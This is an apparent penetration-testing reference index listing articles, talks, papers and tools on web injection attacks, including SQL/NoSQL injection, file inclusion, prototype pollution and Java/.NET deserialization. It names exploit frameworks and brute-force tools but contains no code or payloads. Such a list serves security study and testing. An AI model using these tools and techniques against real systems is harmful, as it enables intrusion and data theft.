- Articles/Blogposts/Writeups
- Command Injection
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations
- Tools
- Resources
- JSON(P) Injection
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Web PenTesting Workshop Part 12 of 12 JSON injection - Jeremy Druin
- Video from the ISSA Kentuckiana Web Pen-Testing Workshop.
- Web PenTesting Workshop Part 12 of 12 JSON injection - Jeremy Druin
- Tools
- Resources
- LDAP Injection
- OGNL Injection
- Papers
- Presentations/Talks/Videos
- Popular Approaches to Preventing Code Injection Attacks are Dangerously Wrong - AppSecUSA 2017
- Remote Code Execution in Firefox beyond memory corruptions(2019) - Frederik Braun
- Browsers are complicated enough to have attack surface beyond memory safety issues. This talk will look into injection flaws in the user interface of Mozilla Firefox, which is implemented in JS, HTML, and an XML-dialect called XUL. With an Cross-Site Scripting (XSS) in the user interface attackers can execute arbitrary code in the context of the main browser application process. This allows for cross-platform exploits of high reliability. The talk discusses past vulnerabilities and will also suggest mitigations that benefit Single Page Applications and other platforms that may suffer from DOM-based XSS, like Electron.
- Tools
- See also: JNDI, JSON, SQLi, XSS
- General
- Testing
- Tools
- Writeups
- General
- Testing
- jndipoc
- Proof of concept showing how java byte code can be injected through InitialContext.lookup() calls
- jndipoc
- Tools
- Writeups
- 101
- Articles/Papers/Writeups
- Tools
- BruteLoops
- A dead simple library providing the foundational logic for efficient password brute force attacks against authentication interfaces.
- Big Friggin Gun (BFG)
- BFG is a simple modular framework to perform brute-force attacks. It uses the BruteLoops library for the brute force and database management logic.
- BruteLoops
- 101
- Articles/Papers/Writeups
- 101
- Articles/Papers/Writeups
- LFI with PHPINFO() Assistance - InsomniaSecurity 2011
- Turning LFI into RFI
- When configured in a specific way the web application would load the JAR file and search within the file for a class. Interestingly enough, in Java classes you can define a static block that is executed upon the class being processed
- Unrestricted File Upload Security Testing - Aptive
- Local file inclusion tricks - Johan Adriaans(2007)
- Upgrade from LFI to RCE via PHP Sessions - (2017)
- CVV #1: Local File Inclusion - SI9INT
- File Inclusion - nets.ec(2016)
- SMTP Log Poisioning through LFI to Remote Code Excecution - Aarti Singh((2019)
- PHP Autoloading: Local File Inclusion by Design - Stephen Shkardoon(2019)
- Practical strategies for exploiting FILE READ vulnerabilities - AFINE(2021)
- Papers
- LFI2RCE (Local File Inclusion to Remote Code Execution) advanced exploitation: /proc shortcuts
- This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities.
- LFI2RCE (Local File Inclusion to Remote Code Execution) advanced exploitation: /proc shortcuts
- Cheat Sheets/Reference Lists
- Testing
- OWASP LFI
- LFI Local File Inclusion Techniques (paper)
- This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such aim is well known this one is a specific technique that was not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.
- Local File Inclusion (LFI) of session files to root escalation - ush.it(2008)
- Windows Blind Files Collection - 0xsp
- Tools
- dotdotpwn
- Liffy
- Liffy is a Local File Inclusion Exploitation tool.
- lfi-labs
- small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns
- psychoPATH - LFI
- This tool is a highly configurable payload generator detecting LFI & web root file uploads. Involves advanced path traversal evasive techniques, dynamic web root list generation, output encoding, site map-searching payload generator, LFI mode, nix & windows support plus single byte generator.
- Kadimus
- Kadimus is a tool to check sites to lfi vulnerability , and also exploit it
- lfipwn
- LFISuite
- General
- pentesterland/Log4Shell
- Log4J infodump by Pentesterland
- pentesterland/Log4Shell
- 101
- NT Web Technology Vulnerabilities - rain.forest.puppy
- NT Web Technology Vulnerabilities - rain.forest.puppy
- First public writeup of SQLi
- "How I hacked PacketStorm" - rain forest puppy
- SQL injection - PortSwigger
- Basic of SQL for SQL Injection - SecurityIdiots
- How to exploit the SQL Injection Attack - sqlzoo
- UNLEASH THE POWER OF SQL INJECTION! | Beginners Guide to Hacking with SQLi - SecAura
- Reference
- General Articles/Blogposts/Writeups
- Finding SQL injections fast with white-box analysis — a recent bug example - Frycos
- Blind (time-based) SQLi - Bug Bounty - jspin.re
- Exploiting difficult SQL injection vulnerabilities using sqlmap: Part 1 - stephen Bradshaw(2017)
- SELECT code_execution FROM * USING SQLite; Gaining code execution using a malicious SQLite database - Omer Gull(2019)
- Beyond SQLi: Obfuscate and Bypass - CWH Underground
- Second Order SQLI: Automating with sqlmap - Jorge Lajara(2019)
- SELECT code_execution FROM * USING SQLite; - Omer Gull(2019)
- BigQuery SQL Injection Cheat Sheet - Ozgur Alp(2020)
- How to fuzz MySQL looking for weird characters - Luca Di Domenico(2020)
- Don't fear the bark, ts_rewrite to dodge the mark - Gaetan Ferry(2020)
- Advanced boolean-based SQLi filter bypass techniques - theMiddle(2020)
- Hunting for SQL injections (SQLis) and Cross-Site Request Forgeries (CSRFs) in WordPress Plugins - Alex Pena(2020)
- Automating Blind Sql Injection - Bad_Jubies(2020)
- SQL Injection filter bypass to perform blind SQL Injection - mannulinux.org(2020)
- SQLMap: One time use CSRF tokens - itsahobby(2022)
- Database Schema (Injection) - Hacksplained
- kleiton0x00/Advanced SQL Injection Cheatsheet
- A cheat sheet that contains advanced queries for SQL Injection of all types.
- SQL Injection Is Still Alive: From a Mall's Interactive Terminal to AWS WAF Bypass - Marc Olivier
- Tortellini in Brodobuf: How serializing data using Google’s Protobuf is not protecting your web app. - Oblio, MrSaighnal(2021)
- "Many developers believe that serializing traffic makes a web application more secure, as well as faster. That would be easy, right? The truth is that security implications remain if the backend code does not adopt adequate defensive measures, regardless of how data is exchanged between the client and server. In this article we will show you how the serialization can’t stop an attacker if the web application is vulnerable at the root. During our activity the application was vulnerable to SQL injection, we will show how to exploit it in case the communications are serialized with Protocol Buffer and how to write a SQLMap tamper for it."
- Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql - Flatt Security(2022)
- How I Found Multiple SQL Injections in 5 Minutes in Bug Bounty - Omar Hashem(2022)
- SQL Injection - PayloadsAllTheThings
- Papers
- Talks/Presentations/Videos
- Writeups
- Training
- SQLi Lab lessons
- SQLI-LABS is a platform to learn SQLI
- SQLi Lab lessons
- Out-of-Band
- Out-of-Band (OOB) SQL Injection - Lee Chun How(2019)
- A Study of Out-of-Band Structured Query Language Injection - Lee Chun How(2019)
- "Out-of-Band (OOB) Structured Query Language (SQL) Injection is an exploitation to exfiltrate data from database through different outbound channel. Common channel use by OOB SQL Injection for data exfiltration are through Domain Name Server (DNS) and HyperText Transfer Protocol (HTTP) channels. This type of SQL injection should address properly due to the impact is on the par with traditional methods. OOB SQL Injection impacts on database systems with insufficient of input validation control in place and allowed access to public, either DNS or HTTP protocol. Test cases and recommendation for remediation have been discussed in this paper in order to raise awareness of the exploitation."
- NoSQL
- Articles/Blogposts/Writeups
- NoSQL Injection in Modern Web Applications - petecorey.com
- N1QL Injection: Kind of SQL Injection in a NoSQL Database - Krzysztof Pranczk(2020)
- nosqli
- NoSql Injection CLI tool, for finding vulnerable websites using MongoDB.
- NoSql Injection Cheatsheet - Nullsweep
- MeteorJS
- MongoDB
- Neo4j
- Talks/Presentations/Videos
- Making Mongo Cry-Attacking NoSQL for Pen Testers - Russell Butturrini(Derbycon2014)
- NoSQL databases continue to grow in popularity due to their scalability, dynamic data structures, ease of development and cloud readiness. As these types of databases become more prevalent, penetration testers need to understand how these databases work, how applications interact with them, and where the inherent weaknesses of NoSQL databases are. This presentation is targeted towards penetration testers and putting the theoretical attacks researchers have discussed into practice during a penetration testing engagement. It will discuss weaknesses with a particular focus on MongoDB and how to quickly and easily exploit them as well as where the high value targets in the system are post exploitation. NoSQLMap, a Python tool written for automatically stealing data from NoSQL database servers and web applications, will also be demoed.
- Abusing NoSQL Databases - Ming Chow
- Slides
- The days of selecting from a few SQL database options for an application are over. There is now a plethora of NoSQL database options to choose from: some are better than others for certain jobs. There are good reasons why developers are choosing them over traditional SQL databases including performance, scalabiltiy, and ease-of-use. Unfortunately like for many hot techologies, security is largely an afterthought in NoSQL databases. This short but concise presentation will illustrate how poor the quality of security in many NoSQL database systems is. This presentation will not be confined to one particular NoSQL database system. Two sets of security issues will be discussed: those that affect all NoSQL database systems such as defaults, authentication, encryption; and those that affect specific NoSQL database systems such as MongoDB and CouchDB. The ideas that we now have a complicated heterogeneous problem and that defense-in-depth is even more necessary will be stressed. There is a common misconception that SQL injection attacks are eliminated by using a NoSQL database system. While specifically SQL injection is largely eliminated, injection attack vectors have increased thanks to JavaScript and the flexibility of NoSQL databases. This presentation will present and demo new classes of injection attacks. Attendees should be familiar with JavaScript and JSON.
- Making Mongo Cry-Attacking NoSQL for Pen Testers - Russell Butturrini(Derbycon2014)
- Papers
- No SQL, No Injection? - Examining NoSQL Security - Aviv Ron, Alexandra Shulman-Peleg, Emanuel Bronshtein
- NoSQL data storage systems have become very popular due to their scalability and ease of use. This paper examines the maturity of security measures for NoSQL databases, addressing their new query and access mechanisms. For example the emergence of new query formats makes the old SQL injection techniques irrelevant, but are NoSQL databases immune to injection in general? The answer is NO. Here we present a few techniques for attacking NoSQL databases such as injections and CSRF. We analyze the source of these vulnerabilities and present methodologies to mitigate the attacks. We show that this new vibrant technological area lacks the security measures and awareness which havedeveloped over the years in traditional RDBMSSQL systems.
- No SQL, No Injection? - Examining NoSQL Security - Aviv Ron, Alexandra Shulman-Peleg, Emanuel Bronshtein
- Tools
- Nosql-Exploitation-Framework
- A FrameWork For NoSQL Scanning and Exploitation Framework
- NoSQL Injector
- NoSQL scanner and injector.
- Nosql-Exploitation-Framework
- Articles/Blogposts/Writeups
- DB2
- MongoDB
- 101
- Tools
- mongoaudit
- mongoaudit is a CLI tool for auditing MongoDB servers, detecting poor security settings and performing automated penetration testing.
- mongot
- mongot makes it easy to extract data from open MongoDB's. By specifying an IP/port with the -d/-p parameters, mongot will connect to an open MongoDB, display any identified database names, collections, and a small sample of data in each.
- mongoaudit
- MS-SQL
- MySQL
- 101
- Articles/Blogposts/Writeups
- Oracle SQL
- 101
- Articles/Blogposts/Writeups
- PostgreSQL
- 101
- Articles/Blogposts/Writeups
- PostgreSQL Pass The Hash protocol design weakness
- Ultimate Guide: PostgreSQL Pentesting - Shlok Yadav(2020)
- A Penetration Tester’s Guide to PostgreSQL - David Hayter(2017)
- Attacking Dell Foglight Server - infosecaddicts.com(2017)
- Postgres “unsupported frontend protocol” mystery - Greg Sabino Mullane(2015)
- SQL Injection Double Uppercut :: How to Achieve Remote Code Execution Against PostgreSQL - Steven Seeley
- Ruby on Rails(ActiveRecord)
- Tools
- sqlmap
- jSQL Injection
- jSQL Injection is a Java application for automatic SQL database injection.
- mongoaudit
- Laduanum
- “Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others.”
- GraFScaN
- Albatar
- Albatar is a SQLi exploitation framework in Python
- Sample Databases
- Databases with sample data for testing
- 101
- Articles/Blogposts/Writeups
- Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - soffensive
- RCE using Path Traversal - inc0gbyt3
- Zip Slip Vulnerability - snyk.io
- Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - soffensive
- Targeting a macOS Application? Update Your Path Traversal Lists - James Sebree
- The Path for Testing Path Traversal Vulnerabilities with Python - Mazin Ahmed(2020)
- Practical Client Side Path Traversal Attacks - mr medi(2022)
- Tools
- dotdotpwn
- It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc.
- dotdotpwn
- 101
- Maintainable JavaScript: Don’t modify objects you don’t own - Nicholas C. Zakas
- What is Prototype Pollution? - Changhui Xu
- What is prototype pollution and why is it such a big deal? - Dani Akash
- JavaScript Prototype Pollution - Part 1 - HTTPVoid(2020)
- Prototype pollution: The dangerous and underrated vulnerability impacting JavaScript applications - Ben Dickson(2021)
- New ways to alert: prototype pollution - Sergey Bobrov, Nikita Stupin(2021)
- The Complete Guide to Prototype Pollution Vulnerabilities - Daniel Elkabes(2021)
- What is prototype poisoning? Prototype bugs explained! - Anton Linné, Christoffer Jerkeby(2022)
- Prototype Pollution in Python - abdulrah33m(2023)
- Client-Side
- Client-Side Prototype Pollution
- "In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact."
- Client-Side Prototype Pollution
- JavaScript
- Articles/Blogposts/Writeups
- Prototype Pollution Affecting jquery package, versions <3.4.0 - snyk.io
- After three years of silence, a new jQuery prototype pollution vulnerability emerges once again - Liran Tal
- Prototype pollution attack (lodash) - holyvier
- Inheritance and the prototype chain - MozillaDevNetwork
- Prototype pollution attack through jQuery $.extend - Asger Feldthaus(HackerOne)
- Analysis and Exploitation of Prototype Pollution attacks on NodeJs - Nullcon HackIM CTF web 500 writeup - Anirudh Anand
- Prototype Pollution - Michal Bentkowski
- Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - Michal Bentkowski
- Prototype pollution – and bypassing client-side HTML sanitizers - Michał Bentkowski(2020)
- "A tale of making internet pollution free"- Exploiting Client-Side Prototype Pollution in the wild - s1r1us
- AST Injection, Prototype Pollution to RCE - POSIX(2020)
- This article describes how to trigger RCE in two well-known template engines, using a new technique called AST Injection.
- Hunting for Prototype Pollution and it’s vulnerable code on JS libraries - kleiton0x7e(2021)- Python
- Prototype Pollution in Flask - lanmaster53(2023)
- Server side prototype pollution, how to detect and exploit - yeswehack
- Hit the Ground Running with Prototype Pollution - Isaac Burton(2023)
- Detecting Server-Side Prototype Pollution - Daniel Thatcher(2023)
- Server-side prototype pollution: Black-box detection without the DoS - Gareth Hayes(2023)
- EJS - Server Side Prototype Pollution gadgets to RCE -
- Articles/Blogposts/Writeups
- Presentations, Talks, Videos
- Prototype pollution attack - HoLyVieR
- Hacking Modern Web Apps with RCE and Prototype Pollution - Abraham Aranguren(2020)
- Very creative way to turn Prototype Pollution into RCE in kibana - Bug Bounty Reports Explained - gregxsunday(2020)
- This video is an explanation of prototype pollution vulnerability in kibana that, in a super cool and very creative way, was used to achieve remote code execution in kibana software.
- Prototype Pollution Attack in NodeJS Application - Olivier Arteau(NorthSec18)
- Prototype Pollution Attack Explained - CyberSecurityTV
- Parameter pollution is a very old attack however I feel like it is underrated. 20+ JS libraries were vulnerable to this attack including JQuery. This is an important attack to learn for any web application pentester. Few automated tools can detect this however, it does require manual inspection.
- Using Chromedp to Hunt for Prototype Pollution - @TomNomNomDotCom(NahamCon2021)
- Prototype pollution is fairly well known, but being a client-side issue it can be difficult to look for at scale. Let's write a bit of Go using the chromedp package to solve that problem!
- Papers
- Silent Spring: Prototype Pollution Leads to Remote Code Execution in Node.js - Mikhail Shcherbakov, Musard Balliu, Cristian-Alexandru Staicu(2022)
- In this paper, we set out to study the problem in a holistic way, from the detection of prototype pollution to detection of gadgets, with the ambitious goal of finding end-to-end exploits beyond DoS, in full-fledged Node.js applications. We build the first multi-staged framework that uses multi- label static taint analysis to identify prototype pollution in Node.js libraries and applications, as well as a hybrid ap- proach to detect universal gadgets, notably, by analyzing the Node.js source code. We implement our framework on top of GitHub’s static analysis framework CodeQL to find 11 universal gadgets in core Node.js APIs, leading to code exe- cution. Furthermore, we use our methodology in a study of 15 popular Node.js applications to identify prototype pollutions and gadgets. We manually exploit eight RCE vulnerabilities in three high-profile applications such as NPM CLI, Parse Server, and Rocket.Chat. Our results provide alarming evi- dence that prototype pollution in combination with powerful universal gadgets lead to RCE in Node.js.
- Silent Spring: Prototype Pollution Leads to Remote Code Execution in Node.js - Mikhail Shcherbakov, Musard Balliu, Cristian-Alexandru Staicu(2022)
- Tools
- client-side-prototype-pollution
- "In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to
document.location
parsing and useful script gadgets that can be used to demonstrate the impact."
- "In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to
- PPScan
- Client Side Prototype Pollution Scanner
- protoscan
- Prototype Pollution Scanner made in Golang, it was actually made by @tomnomnom in NahamCon2021
- client-side-prototype-pollution
- 101
- Articles/Blogposts/Writeups
- Tools
- Talks/Presentations/Videos
- Reflected File Download - A New Web Attack Vector - BHEU 2014
- Skip to 19:24 for technical content
- Paper
- Reflected File Download - A New Web Attack Vector - BHEU 2014
- 101
- Relative Path Overwrite Explanation/Writeup
- RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.
- Relative Path Overwrite Explanation/Writeup
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Papers
- Understanding and Mitigating theSecurity Risks of ContentInclusion in Web Browsers - Sajjad Arshad(2020)
- In this thesis, I propose novel research into understanding and mitigatingthe security risks of content inclusion in web browsers to protect website pub-lishers as well as their users. First, I introduce an in-browser approach calledExcisionto automatically detect and block malicious third-party content in-clusions as web pages are loaded into the user’s browser or during the execu-tion of browser extensions. Then, I proposeOriginTracer, an in-browserapproach to highlight extension-based content modification of web pages. Fi-1 nally, I present the first in-depth study of style injection vulnerability usingRPO and discuss potential countermeasures
- Understanding and Mitigating theSecurity Risks of ContentInclusion in Web Browsers - Sajjad Arshad(2020)
- General
- Tools
- Miscellaneous
- 101
- General
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Pentesting J2EE - Marc Schönefeld(BlackHat 2006)
- History of Deserialization: RCE for the modern web applications - Philippe Arteau(2019)
- Friday the 13th JSON Attacks - Alvaro Muñoz, Oleksandr Mirosh(BHUSA17)
- "In this paper, we will focus on JSON libraries and we will analyze which ones could allow arbitrary code execution upon deserialization of untrusted data. We will also have a look at .NET world by reviewing existing research on this field and completing it with updated list of vulnerable formatters and proof of concept gadgets to attack them. To finish, we will extend the research on JSON serialization libraries and .NET formatters into any serialization format available. We will provide guidance to find out whether it could be attacked and how to attack it. Where possible, we will also provide mitigation advice to help avoid vulnerable configurations that could turn your serialization library vulnerable."
- Json Deserialization Exploitation: RCE by Design - ?(2018)
- Java
- 101
- Articles/Blogposts/Writeups
- Java Deserialization Security FAQ - christian-schneider.net
- Detecting deserialization bugs with DNS exfiltration - Philippe Arteau(2017)
- Reliable discovery and Exploitation of Java Deserialization vulns(2017)
- What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability. - breenmachine(2015)
- Fastjson: exceptional deserialization vulnerabilities - Peter Stockli(2020)
- Liferay Portal JSON Web Service RCE Vulnerabilities - Markus Wulftange(2020)
- Deserialized Double Dirty - John Skipper(2018)
- Detecting deserialization bugs with DNS exfiltration - Philippe Arteau(2017)
- Testing and exploiting Java Deserialization in 2021 - AFINE(2021)
- Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni(2019)
- Unexpected Deserialization pt.1 - JMS - SilentSignal(2021)
- Demystifying Insecure Deserialisation on JSF Application - Dhiyaneshwaran(2021)
- Finding gadgets like it's 2015: part 1 - Hugo Vincent(2021)
- Finding gadgets like it's 2022 - Hugo Vincent(2022)
- General
- Java-Deserialization-Cheat-Sheet
- A cheat sheet for pentesters about Java Native Binary Deserialization vulnerabilities
- Java-Deserialization-Cheat-Sheet
- Presentations/Talks/Videos
- Pwning Your Java Messaging With De- serialization Vulnerabilities
- Marshalling Pickles - Chris Frohoff, Gabe Lawrence(AppSecCali 2015)
- Slides
- Object serialization technologies allow programs to easily convert in-memory objects to and from various binary and textual data formats for storage or transfer – but with great power comes great responsibility, because deserializing objects from untrusted data can ruin your day. We will look at historical and modern vulnerabilities across different languages and serialization technologies, including Python, Ruby, and Java, and show how to exploit these issues to achieve code execution. We will also cover some strategies to protect applications from these types of attacks.
- Exploiting Deserialization Vulnerabilities in Java - Matthis Kaiser(2015)
- Deserialization vulnerabilities in Java are lesser known and exploited (compared to unserialize() in PHP). This talk will give insights how this bug class can be turned into serverside Remote Code Execution. Details and a demo will be given for one of my patched vulnerabilities (CVE-2015-6576, Atlassian Bamboo RCE).
- Deserialize My Shorts Or How I Learned to Start Worrying and Hate Java Object Deserialization - Chris Frohoff, Gabe Lawrence
- Slides
- Object deserialization is an established but poorly understood attack vector in applications that is disturbingly prevalent across many languages, platforms, formats, and libraries. In January 2015 at AppSec California, Chris Frohoff and Gabe Lawrence gave a talk on this topic, covering deserialization vulnerabilities across platforms, the many forms they take, and places they can be found. It covered, among other things, somewhat novel techniques using classes in commonly used libraries for attacking Java serialization that were subsequently released in the form of the ysoserial tool. Few people noticed until late 2015, when other researchers used these techniques/tools to exploit well known products such as Bamboo, WebLogic, WebSphere, ApacheMQ, and Jenkins, and then services such as PayPal. Since then, the topic has gotten some long-overdue attention and great work is being done by many to improve our understanding and developer awareness on the subject. This talk will review the details of Java deserialization exploit techniques and mitigations, as well as report on some of the recent (and future) activity in this area.
- Automated Discovery of Deserialization Gadget Chains - Ian Haken(Defcon26)
- In-Memory Data Grid Applications: Finding Common Java Deserialization Vulnerabilities with CodeQL - Man Yue Mo(2019)
- [Pwning Your Java Messaging With Deserialization Vulnerabilities - Matthias Kaiser(BHUSA2016)](https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf
- Oracle Java Deserialization Vulnerabilities - Stephen Kost, Phil Reimann(2016)
- Java deserialization is a class of security vulnerabilities that can result in server-side remote code execution (RCE). As many Oracle products are based on Java, deserialization bugs are found in many Oracle environments especially those using Oracle WebLogic, Oracle Fusion Middleware, and Oracle E-Business Suite. As an example, in November 2015 Oracle released an out-of-cycle security fix (CVE-2015-4852) in order to fix a deserialization bug in Oracle WebLogic. This education webinar provides an understanding of Java deserialization vulnerabilities, the potential impact for Oracle environments, and strategies to protect an Oracle environment from this class of security vulnerabilities.
- Defending against Java Deserialization Vulnerabilities - Luca Carettoni(2016)
- Deserialization: what, how and why [not] - Alexei Kojenov(AppSecUSA2018)
- Insecure deserialization was recently added to OWASP's list of the top 10 most critical web application security risks, yet it is by no means a new vulnerability category. For years, data serialization and deserialization have been used in applications, services and frameworks, with many programming languages supporting them natively. Deserialization got more attention recently as a potential vehicle to conduct several types of attacks: data tampering, authentication bypass, privilege escalation, various injections and, ultimately, remote code execution. Two prominent vulnerabilities in Apache Commons and Apache Struts, both allowing remote code execution, also contributed to raising awareness of this risk. We will discuss how data serialization and deserialization are used in software, the dangers of deserializing untrusted input, and how to avoid insecure deserialization vulnerabilities. The presentation will contain several code examples with live demos of bypassing security controls due to incorrect deserialization. The examples and demos will use Java and its native serialization, but the techniques can be extrapolated to other languages and formats.
- Java Serialization security issues - Erno Jeges - OWASP Bay Area(2018)
- In this short talk, we'll take a look at the various security issues coming from deserializing untrusted data in Java: information disclosure, denial of service, and even code execution. We'll examine these issues through live demonstrations with step-by-step explanations of what can go wrong – and how. Most importantly, we'll discuss several best practices and countermeasures you can use as a developer to protect yourself from these issues – or prevent them from affecting you in the first place.
- Deserialization: what, how and why [not] - Alexei Kojenov(AppSec USA2018)
- Slides
- Code
- Insecure deserialization was recently added to OWASP's list of the top 10 most critical web application security risks, yet it is by no means a new vulnerability category. For years, data serialization and deserialization have been used in applications, services and frameworks, with many programming languages supporting them natively. Deserialization got more attention recently as a potential vehicle to conduct several types of attacks: data tampering, authentication bypass, privilege escalation, various injections and, ultimately, remote code execution. Two prominent vulnerabilities in Apache Commons and Apache Struts, both allowing remote code execution, also contributed to raising awareness of this risk. We will discuss how data serialization and deserialization are used in software, the dangers of deserializing untrusted input, and how to avoid insecure deserialization vulnerabilities. The presentation will contain several code examples with live demos of bypassing security controls due to incorrect deserialization. The examples and demos will use Java and its native serialization, but the techniques can be extrapolated to other languages and formats.
- Marshalling Pickles - Chris Frohoff & Gabriel Lawrence(OWASPAppSec California2015)
- Object serialization technologies allow programs to easily convert in-memory objects to and from various binary and textual data formats for storage or transfer – but with great power comes great responsibility, because deserializing objects from untrusted data can ruin your day. We will look at historical and modern vulnerabilities across different languages and serialization technologies, including Python, Ruby, and Java, and show how to exploit these issues to achieve code execution. We will also cover some strategies to protect applications from these types of attacks.
- Automated Discovery of Deserialization Gadget Chains - Ian Haken(Defcon26)
- New Exploit Technique In Java Deserialization Attack - Yang Zhang, Yongtao Wang, Keyi Li, Kunzhe Chai(BHEU2019)
- In our depth research, we analyzed more than 10000+ Java third-party libraries and found many cases which can be exploited in real-world attack scenarios. In this talk, we will bat around the principle and exploit technique of these vulnerabilities. Also, we will present how to pwn target server by our new exploit technique. It can not only improve the effect of java deserialization vulnerability but also enhance other Java security issues impact, and we will discuss profound impacts of the attack vector in the java security field.
- Papers
- Java Unmarshaller Security - Turning your data into code execution
- This paper presents an analysis, including exploitation details, of various Java open-source marshalling libraries that allow(ed) for unmarshalling of arbitrary, attacker supplied, types and shows that no matter how this process is performed and what implicit constraints are in place it is prone to similar exploitation techniques.
- tool from the above paper: marshalsec
- Java Unmarshaller Security - Turning your data into code execution
- Tools
- Break Fast Serial
- A proof of concept that demonstrates asynchronous scanning for Java deserialization bugs
- ysoserial
- JMET
- JMET was released at Blackhat USA 2016 and is an outcome of Code White's research effort presented in the talk "Pwning Your Java Messaging With Deserialization Vulnerabilities". The goal of JMET is to make the exploitation of the Java Message Service (JMS) easy. In the talk more than 12 JMS client implementations where shown, vulnerable to deserialization attacks. The specific deserialization vulnerabilities were found in ObjectMessage implementations (classes implementing javax.jms.ObjectMessage).
- GadgetProbe
- GadgetProbe takes a wordlist of Java classes, outputs serialized DNS callback objects, and reports what's lurking in the remote classpath.
- Blogpost
- marshalsec
- This paper presents an analysis, including exploitation details, of various Java open-source marshalling libraries that allow(ed) for unmarshalling of arbitrary, attacker supplied, types and shows that no matter how this process is performed and what implicit constraints are in place it is prone to similar exploitation techniques.
- QLinspector
- Finding Java gadget chains with CodeQL.
- SerializationDumper
- A tool to dump and rebuild Java serialization streams and Java RMI packet contents in a more human readable form. The tool does not deserialize the stream (i.e. objects in the stream are not instantiated), so it does not require access to the classes that were used in the stream*. This tool was developed to support research into Java deserialization vulnerabilities after spending many hours manually decoding raw serialization streams to debug code!
- Break Fast Serial
- Exploits
- SerialKiller: Bypass Gadget Collection
- Collection of Bypass Gadgets that can be used in JVM Deserialization Gadget chains to bypass "Look-Ahead ObjectInputStreams" desfensive deserialization.
- Serianalyzer
- A static byte code analyzer for Java deserialization gadget research
- Java Deserialization Exploits
- A collection of Java Deserialization Exploits
- Java Deserialization Exploits
- A collection of curated Java Deserialization Exploits
- SerialKiller: Bypass Gadget Collection
- .NET
- Articles/Blogposts/Writeups
- .NET Serialization: Detecting and defending vulnerable endpoints - Alvaro Munoz
- ASP.NET resource files (.RESX) and deserialisation issues - Soroush Dalili
- RCEVIL.NET: A Super Serial Story - Jared McLaren(BSides Iowa2019)
- HITCON 2018: Why so Serials? Write-up - cyku.tw
- HITCON CTF 2018 - Why so Serials? Writeup - Orange
- Talks/Presentations
- .NET Serialization: Detecting and defending vulnerable endpoints - Alvaro Munez(LocoMocoSec2018)
- 2016 was the year of Java deserialization apocalypse. Although Java Deserialization attacks were known for years, the publication of the Apache Commons Collection Remote Code Execution gadget (RCE from now on) finally brought this forgotten vulnerability to the spotlight and motivated the community to start finding and fixing these issues. .NET is next in line; formatters such as BinaryFormatter and NetDataContractSerializer are known to share similar mechanics which make them potentially vulnerable to similar RCE attacks. However, as we saw with Java before, the lack of RCE gadgets led some software vendors to not take this issue seriously. In this talk, we will analyze .NET serializers including third party JSON parsers for potential RCE vectors. We will provide real-world examples of vulnerable code and more importantly, we will review how these vulnerabilities were detected and fixed in each case.
- Friday the 13th: Attacking JSON - Alvaro Muñoz & Oleksandr Mirosh(AppSecUSA 2017)
- 2016 was the year of Java deserialization apocalypse. Although Java Deserialization attacks were known for years, the publication of the Apache Commons Collection Remote Code Execution (RCE from now on) gadget finally brought this forgotten vulnerability to the spotlight and motivated the community to start finding and fixing these issues. One of the most suggested solutions for avoiding Java deserialization issues was to move away from Java Deserialization altogether and use safer formats such as JSON. In this talk, we will analyze the most popular JSON parsers in both .NET and Java for potential RCE vectors. We will demonstrate that RCE is also possible in these libraries and present details about the ones that are vulnerable to RCE by default. We will also discuss common configurations that make other libraries vulnerable. In addition to focusing on JSON format, we will generalize the attack techniques to other serialization formats. In particular, we will pay close attention to several serialization formats in .NET. These formats have also been known to be vulnerable since 2012 but the lack of known RCE gadgets led some software vendors to not take this issue seriously. We hope this talk will change this. With the intention of bringing the due attention to this vulnerability class in .NET, we will review the known vulnerable formats, present other formats which we found to be vulnerable as well and conclude presenting several gadgets from system libraries that may be used to achieve RCE in a stable way: no memory corruption -- just simple process invocation. Finally, we will provide recommendations on how to determine if your code is vulnerable, provide remediation advice, and discuss alternative approaches.
- .NET Roulette: Exploiting Insecure Deserialization in Telerik UI - Caleb Gross(DerpCon2020)
- So you're pentesting a .NET application, and you notice the server is deserializing user input—great! You know this is bad in theory, but have no idea how to actually get a shell in time for the engagement. This talk will bring you up to speed on how .NET deserialization works and how to get shells on real applications. In this presentation, we'll dig into the internals of CVE-2019-18935, a deserialization vulnerability that allows RCE on the popular web UI suite Telerik UI for ASP.NET AJAX. After demonstrating how to exploit this issue step-by-step, you'll learn a hands-on approach to debugging a locally running ASP.NET application, quickly assessing the site's attack surface, and examining possible avenues for finding and exploiting insecure uses of deserialization. This talk is intended for penetration testers and security researchers who'd like to begin testing deserialization vulnerabilities in .NET software.
- .NET Serialization: Detecting and defending vulnerable endpoints - Alvaro Munez(LocoMocoSec2018)
- Papers
- Tools
- YSoSerial.Net
